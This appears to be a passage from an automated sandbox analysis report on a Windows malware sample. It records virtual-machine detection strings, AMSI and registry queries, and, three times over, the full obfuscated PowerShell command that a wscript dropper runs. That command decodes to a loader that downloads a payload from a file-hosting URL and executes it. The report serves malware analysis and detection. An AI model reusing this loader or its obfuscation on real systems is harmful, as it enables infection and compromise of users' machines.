Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: wscript.exe, 00000000.00000003.1348888983.00000194338E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@b
Source: wscript.exe, 00000000.00000003.1349349433.00000194338E4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Win32_ServiceStoppedOKvmicvssvmicvssUnknownUnknownUnknownWin32_ServiceWin32_ComputerSystemuser-PCvmicvsstructures|S
Source: wscript.exe, 00000000.00000003.1349349433.00000194338E4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmicshutdown
Source: wscript.exe, 00000000.00000003.1349349433.00000194338E4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmicvss
Source: wscript.exe, 00000000.00000003.1349349433.00000194338E4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Win32_ServiceStoppedOKvmicshutdownvmicshutdownUnknownUnknownUnknownWin32_ServiceWin32_ComputerSystemTINA-PCvmicshutdown
Source: wscript.exe, 00000000.00000003.1349349433.00000194338ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1331460946.00000194358C7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1351121003.00000194358C7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1332156430.00000194358C7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1331955967.00000194338D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1348682345.00000194358C7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1348888983.00000194338E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1350748051.00000194338EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1332023628.00000194358C7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2635802751.000001D676B76000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000003.1332156430.00000194358B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1331460946.00000194358B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1348682345.00000194358B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1332023628.00000194358B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1351121003.00000194358B9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW{2yv
Source: wscript.exe, 00000000.00000002.1350657100.00000194338E4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1349871777.00000194338E4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1349349433.00000194338E4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Win32_ServiceStoppedOKvmickvpexchangevmickvpexchangeProvides a mechanism to exchange data between the virtual machine and the operating system running on the physical computer.Share ProcessManualNormalC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -pLocalSystemHyper-V Data Exchange ServiceHyper-V Data Exchange ServiceWin32_ServiceWin32_ComputerSystemuser-PCvmickvpexchangeLMEM8
Source: wscript.exe, 00000000.00000002.1350657100.00000194338E4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1349871777.00000194338E4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1349349433.00000194338E4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: wscript.exe, 00000000.00000003.1348888983.00000194338E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: artbeatvmicheartbeatUnknownUnknownUnknownWin32_ServiceWin32_ComputerSystemTINA-PCvmicheartbeatS
Source: wscript.exe, 00000000.00000003.1348888983.00000194338E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmicheartbeat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: Yara match File source: amsi64_7752.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7752, type: MEMORYSTR
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Cantharidating Desinficerer afgrdernes Mistakenly Bunsen spadestres #>;$Befleaing='subclans';<#Opinionsdannelserne leia Entomophthorous Hedninger #>;$Essens=$host.PrivateData;If ($Essens) {$Becollier++;}function Fabrikskomplekserne($syngespil){$Brace66=$Frafaldendes+$syngespil.Length-$Becollier;for( $Acuserl=3;$Acuserl -lt $Brace66;$Acuserl+=4){$stevedorerne+=$syngespil[$Acuserl];}$stevedorerne;}function Trolddomskunsternes($Pretabulation){ . ($Untenseness) ($Pretabulation);}$Plattenslager=Fabrikskomplekserne 'DimMsejoDehzsanimetlAntlE.sa a/spi5Unr.Ga 0.ka Wax( K,WAntiPann PodRumoa awIdisAlm t N reT Me Lea1Fil0Fel.ska0si.;fje TrtW.emi G,nCry6Cla4Tan; ,p staxNot6 ra4 Il;Pe Pr r AlvTin:Nya1I t2Ou 1.mt.Bio0Ret)Ice AcGOvee Elc TokF do Mi/met2Fli0 nf1 ,h0Ren0 ta1 nd0 B 1 ar AalFsemiHalrPave vef FioW.ax Il/Tun1As.2 ri1sna. t0Hvi ';$Unentailed=Fabrikskomplekserne ' F.U ,ns alEGr REks-sarABebg EleMa nTipTRes ';$Certifiability=Fabrikskomplekserne ' GehRe t Unt hpFe sFum:Brn/Che/OpddEjerLydi CovJaze nu.,ragA eo CaoMilg ,elB,sesha. .oc.olo,oemFed/ P.u P cNo.?Po e.etxmedpKo o Puras.tMa =VaadFinoFngwMe.nUnll s oTe.a nodPre& igiRidd ar=,la1CluTserFTegXOnyc.fdrPreJP eWOutTD.yGPjamLysaEvic Na2Gr hElejO r-DevV Trsm dL.aro,idWcepxDisw ,es f.sseskBi gUnoBstv1tor7M g6Gyls G. ';$Tilskringskursuset=Fabrikskomplekserne 'F.b>Lac ';$Untenseness=Fabrikskomplekserne ' UniTinEEn xDo ';$Remburserne='Kohoveder';$bakie='\Bumpenes.sam';Trolddomskunsternes (Fabrikskomplekserne 'Tre$ Teg mbl Hao mmb anaLomlsk :EndDFesuvoltFr,itr.aVacb Bll eePo =Mon$ lae Pan upvPre:Ka as,mpMisp CodOrdaRaatBaraTek+ De$EkkbD aa rak uniBroeO d ');Trolddomskunsternes (Fabrikskomplekserne 'Tan$,ksgD al FooAnnbBl a Hylpha: KaP Torpolel,di Almbelp vo ndrGartBle=sup$LimC eveprorApptsayiza f ai .kaFisbFaliOrnlChaiHyptWriyTen.CarsProp MilTeli ExtP l(Pai$PraTd.wivesl O.s HuksamrFo iCaln Zog scstilkPosuB.drs tsBa u TosPr.e aftBla)B l ');Trolddomskunsternes (Fabrikskomplekserne 'Mol[.erN.ocePret.tu.Angs tre,iarsmevHumiFe cgrues,rP ao lmiLevnDeft MoMsu aCasn ska olgslieB.yrAdn] Wr:Gth:BrssFree T cUnmu,anrYppi nttsvey InPChirbriostitOutoRifcMejotyrl Fo Bof= st ,ys[In.NUboeD.rtTpp.s ossofeOvecUnduN,tr Fri et ubyAfvPBjerKofoKretUnaowitcMatoKinlskrTGluyskipPosesal]A i: ej:Y uT oclObjs Kv1sym2Mas ');$Certifiability=$Preimport[0];$Fortolke=(Fabrikskomplekserne ' re$BlagstaLsano arBMulasjkLKon:GenC BrhMo,a.nnN asn,ndiPoleLe.=ComNb teHooW .i-sp osneBUdnjacce asCArkTKas UbesB uYCams CeTMune dsMTra.sp,nmisEposT De. nowBereNonb LycNonl,isIBrieHusN Hjtopf ');Trolddomskunsternes ($Fortolke);Trolddomskunsternes (Fabrikskomplekserne 'lug$,nkCHyphPreaEnenBa.ns,ei MieAnt.VivHK,nes raAt,d GyeC xr UdsFel[ st$NynULymnFleeIn.n ontRe aUnoi AclBeeeFord Ac]Ani=sk $TrkPUrelsataFe.tBentinteKg.n ytsicilIrras,igDrme CerHol ');$Bufferkapaciteterne=Fabrikskomplekserne 'Unp$ DaCDeph.araBilnCoan raiInteD,m.Und Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#cantharidating desinficerer afgrdernes mistakenly bunsen spadestres #>;$befleaing='subclans';<#opinionsdannelserne leia entomophthorous hedninger #>;$essens=$host.privatedata;if ($essens) {$becollier++;}function fabrikskomplekserne($syngespil){$brace66=$frafaldendes+$syngespil.length-$becollier;for( $acuserl=3;$acuserl -lt $brace66;$acuserl+=4){$stevedorerne+=$syngespil[$acuserl];}$stevedorerne;}function trolddomskunsternes($pretabulation){ . ($untenseness) ($pretabulation);}$plattenslager=fabrikskomplekserne 'dimmsejodehzsanimetlantle.sa a/spi5unr.ga 0.ka wax( k,wantipann podrumoa awidisalm t n ret me lea1fil0fel.ska0si.;fje trtw.emi g,ncry6cla4tan; ,p staxnot6 ra4 il;pe pr r alvtin:nya1i t2ou 1.mt.bio0ret)ice acgovee elc tokf do mi/met2fli0 nf1 ,h0ren0 ta1 nd0 b 1 ar aalfsemihalrpave vef fiow.ax il/tun1as.2 ri1sna. t0hvi ';$unentailed=fabrikskomplekserne ' f.u ,ns alegr reks-sarabebg elema ntiptres ';$certifiability=fabrikskomplekserne ' gehre t unt hpfe sfum:brn/che/opddejerlydi covjaze nu.,raga eo caomilg ,elb,sesha. .oc.olo,oemfed/ p.u p cno.?po e.etxmedpko o puras.tma =vaadfinofngwme.nunll s ote.a nodpre& igiridd ar=,la1clutserftegxonyc.fdrprejp ewouttd.ygpjamlysaevic na2gr helejo r-devv trsm dl.aro,idwcepxdisw ,es f.sseskbi gunobstv1tor7m g6gyls g. ';$tilskringskursuset=fabrikskomplekserne 'f.b>lac ';$untenseness=fabrikskomplekserne ' unitineen xdo ';$remburserne='kohoveder';$bakie='\bumpenes.sam';trolddomskunsternes (fabrikskomplekserne 'tre$ teg mbl hao mmb analomlsk :enddfesuvoltfr,itr.avacb bll eepo =mon$ lae pan upvpre:ka as,mpmisp codordaraatbaratek+ de$ekkbd aa rak unibroeo d ');trolddomskunsternes (fabrikskomplekserne 'tan$,ksgd al fooannbbl a hylpha: kap torpolel,di almbelp vo ndrgartble=sup$limc eveprorapptsayiza f ai .kafisbfaliornlchaihyptwriyten.carsprop milteli extp l(pai$pratd.wivesl o.s huksamrfo icaln zog scstilkposub.drs tsba u tospr.e aftbla)b l ');trolddomskunsternes (fabrikskomplekserne 'mol[.ern.ocepret.tu.angs tre,iarsmevhumife cgrues,rp ao lmilevndeft momsu acasn ska olgslieb.yradn] wr:gth:brssfree t cunmu,anryppi nttsvey inpchirbriostitoutorifcmejotyrl fo bof= st ,ys[in.nuboed.rttpp.s ossofeovecundun,tr fri et ubyafvpbjerkofokretunaowitcmatokinlskrtgluyskipposesal]a i: ej:y ut oclobjs kv1sym2mas ');$certifiability=$preimport[0];$fortolke=(fabrikskomplekserne ' re$blagstalsano arbmulasjklkon:genc brhmo,a.nnn asn,ndipolele.=comnb tehoow .i-sp osnebudnjacce ascarktkas ubesb uycams cetmune dsmtra.sp,nmisepost de. nowberenonb lycnonl,isibriehusn hjtopf ');trolddomskunsternes ($fortolke);trolddomskunsternes (fabrikskomplekserne 'lug$,nkchyphpreaenenba.ns,ei mieant.vivhk,nes raat,d gyec xr udsfel[ st$nynulymnfleein.n ontre aunoi aclbeeeford ac]ani=sk $trkpurelsatafe.tbentintekg.n ytsicilirras,igdrme cerhol ');$bufferkapaciteterne=fabrikskomplekserne 'unp$ dacdeph.arabilncoan raiinted,m.und
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#cantharidating desinficerer afgrdernes mistakenly bunsen spadestres #>;$befleaing='subclans';<#opinionsdannelserne leia entomophthorous hedninger #>;$essens=$host.privatedata;if ($essens) {$becollier++;}function fabrikskomplekserne($syngespil){$brace66=$frafaldendes+$syngespil.length-$becollier;for( $acuserl=3;$acuserl -lt $brace66;$acuserl+=4){$stevedorerne+=$syngespil[$acuserl];}$stevedorerne;}function trolddomskunsternes($pretabulation){ . ($untenseness) ($pretabulation);}$plattenslager=fabrikskomplekserne 'dimmsejodehzsanimetlantle.sa a/spi5unr.ga 0.ka wax( k,wantipann podrumoa awidisalm t n ret me lea1fil0fel.ska0si.;fje trtw.emi g,ncry6cla4tan; ,p staxnot6 ra4 il;pe pr r alvtin:nya1i t2ou 1.mt.bio0ret)ice acgovee elc tokf do mi/met2fli0 nf1 ,h0ren0 ta1 nd0 b 1 ar aalfsemihalrpave vef fiow.ax il/tun1as.2 ri1sna. t0hvi ';$unentailed=fabrikskomplekserne ' f.u ,ns alegr reks-sarabebg elema ntiptres ';$certifiability=fabrikskomplekserne ' gehre t unt hpfe sfum:brn/che/opddejerlydi covjaze nu.,raga eo caomilg ,elb,sesha. .oc.olo,oemfed/ p.u p cno.?po e.etxmedpko o puras.tma =vaadfinofngwme.nunll s ote.a nodpre& igiridd ar=,la1clutserftegxonyc.fdrprejp ewouttd.ygpjamlysaevic na2gr helejo r-devv trsm dl.aro,idwcepxdisw ,es f.sseskbi gunobstv1tor7m g6gyls g. ';$tilskringskursuset=fabrikskomplekserne 'f.b>lac ';$untenseness=fabrikskomplekserne ' unitineen xdo ';$remburserne='kohoveder';$bakie='\bumpenes.sam';trolddomskunsternes (fabrikskomplekserne 'tre$ teg mbl hao mmb analomlsk :enddfesuvoltfr,itr.avacb bll eepo =mon$ lae pan upvpre:ka as,mpmisp codordaraatbaratek+ de$ekkbd aa rak unibroeo d ');trolddomskunsternes (fabrikskomplekserne 'tan$,ksgd al fooannbbl a hylpha: kap torpolel,di almbelp vo ndrgartble=sup$limc eveprorapptsayiza f ai .kafisbfaliornlchaihyptwriyten.carsprop milteli extp l(pai$pratd.wivesl o.s huksamrfo icaln zog scstilkposub.drs tsba u tospr.e aftbla)b l ');trolddomskunsternes (fabrikskomplekserne 'mol[.ern.ocepret.tu.angs tre,iarsmevhumife cgrues,rp ao lmilevndeft momsu acasn ska olgslieb.yradn] wr:gth:brssfree t cunmu,anryppi nttsvey inpchirbriostitoutorifcmejotyrl fo bof= st ,ys[in.nuboed.rttpp.s ossofeovecundun,tr fri et ubyafvpbjerkofokretunaowitcmatokinlskrtgluyskipposesal]a i: ej:y ut oclobjs kv1sym2mas ');$certifiability=$preimport[0];$fortolke=(fabrikskomplekserne ' re$blagstalsano arbmulasjklkon:genc brhmo,a.nnn asn,ndipolele.=comnb tehoow .i-sp osnebudnjacce ascarktkas ubesb uycams cetmune dsmtra.sp,nmisepost de. nowberenonb lycnonl,isibriehusn hjtopf ');trolddomskunsternes ($fortolke);trolddomskunsternes (fabrikskomplekserne 'lug$,nkchyphpreaenenba.ns,ei mieant.vivhk,nes raat,d gyec xr udsfel[ st$nynulymnfleein.n ontre aunoi aclbeeeford ac]ani=sk $trkpurelsatafe.tbentintekg.n ytsicilirras,igdrme cerhol ');$bufferkapaciteterne=fabrikskomplekserne 'unp$ dacdeph.arabilncoan raiinted,m.und Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs